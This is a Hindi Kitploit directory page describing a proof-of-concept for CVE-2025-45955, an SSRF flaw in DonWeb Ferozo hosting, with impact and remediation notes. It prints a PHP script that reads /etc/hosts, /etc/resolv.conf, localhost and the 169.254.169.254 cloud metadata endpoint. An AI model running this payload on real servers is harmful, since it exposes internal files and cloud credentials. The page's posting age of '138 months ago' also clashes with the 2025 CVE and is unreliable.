Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-45955 — CVE-2025-45955 के लिए Proof-of-concept एक्सप्लॉइट जो DonWeb Ferozo होस्टिंग प्लेटफ़ॉर्म में Server-Side Request Forgery (SSRF) का प्रदर्शन करता है, जिससे आंतरिक बुनियादी ढांचे की मैपिंग और क्लाउड मेटाडेटा गणना संभव होती है। | Kitploit
उपकरण/GitHubGitHub/surendrapuppala7/cve-2025-45955
टोहीभेद्यता विश्लेषणशोषणजानकारी एकत्र करनावेब सुरक्षाक्लाउड सुरक्षा
GitHubsurendrapuppala7/cve-2025-45955

CVE-2025-45955

CVE-2025-45955 के लिए Proof-of-concept एक्सप्लॉइट जो DonWeb Ferozo होस्टिंग प्लेटफ़ॉर्म में Server-Side Request Forgery (SSRF) का प्रदर्शन करता है, जिससे आंतरिक बुनियादी ढांचे की मैपिंग और क्लाउड मेटाडेटा गणना संभव होती है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
138 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-45955

DonWeb Ferozo में सर्वर-साइड अनुरोध जालसाजी (CVE-2025-45955)

विवरण

एक हमलावर Ferozo होस्टिंग प्लेटफॉर्म पर विशेष रूप से तैयार की गई PHP फ़ाइल अपलोड और निष्पादित करके इस कमजोरी का शोषण कर सकता है। फ़ाइल तक पहुँचने पर, यह आंतरिक सेवाओं (जैसे 127.0.0.1, 169.254.169.254, या सर्विस मेश एंडपॉइंट), स्थानीय फ़ाइलों (जैसे file:///etc/passwd), और ज्ञात क्लाउड मेटाडेटा एंडपॉइंट को लक्षित करते हुए SSRF प्रयासों की एक श्रृंखला शुरू करता है। स्क्रिप्ट प्रतिक्रिया या त्रुटि संदेश एकत्र करती है, जिससे हमलावर को आंतरिक बुनियादी ढांचे का मानचित्रण करने, सुलभ सेवाओं की गणना करने और आगे के शोषण के लिए संवेदनशील जानकारी एकत्र करने की अनुमति मिलती है।

प्रूफ ऑफ कॉन्सेप्ट (PoC)

निम्नलिखित कोड कमजोरी को प्रदर्शित करता है:

root@kitploit:~
<?php
$targets = [
  "file:///etc/hosts",
  "file:///etc/resolv.conf",
  "http://127.0.0.1/",
  "http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
  echo "[*] Trying: $url\n";
  $res = @file_get_contents($url);
  echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>

प्रभावित घटक

  • Ferozo होस्टिंग प्लेटफॉर्म (DonWeb)
  • PHP-आधारित वातावरण जो उपयोगकर्ता द्वारा अपलोड या नियंत्रित PHP फ़ाइल निष्पादन की अनुमति देते हैं

प्रभाव

  • सूचना प्रकटीकरण: आंतरिक IP, फ़ाइल सामग्री, क्लाउड मेटाडेटा एंडपॉइंट लीक करता है
  • बुनियादी ढांचे की टोह: पोर्ट और सेवा गणना सक्षम करता है (Docker, Kubelet, आदि)
  • क्लाउड शोषण क्षमता: AWS, GCP और Alibaba जैसे ज्ञात मेटाडेटा एंडपॉइंट की जांच करता है
  • जंजीर बनाने का अवसर: RCE या पिवटिंग के लिए अन्य स्थानीय कमजोरियों के साथ जोड़ा जा सकता है

उपचार

  • फ़ाइल समावेशन और URL एक्सेस फ़ंक्शंस (file_get_contents, fopen, आदि) को प्रतिबंधित करें
  • आउटबाउंड फ़ायरवॉल नियमों के माध्यम से आंतरिक IP रेंज (127.0.0.0/8, 169.254.169.254, आदि) तक पहुंच को अवरुद्ध करें
  • उपयोगकर्ता इनपुट का ऑडिट और स्वच्छीकरण करें जो फ़ाइल पथ या URL को प्रभावित कर सकते हैं

CVE ID

CVE-2025-45955


खोजकर्ता

द्वारा रिपोर्ट किया गया: [Facundo Fernandez, Jinook Kim, Surendra Puppala / सुरक्षा शोधकर्ता | @BYU]

टूल डाउनलोड करें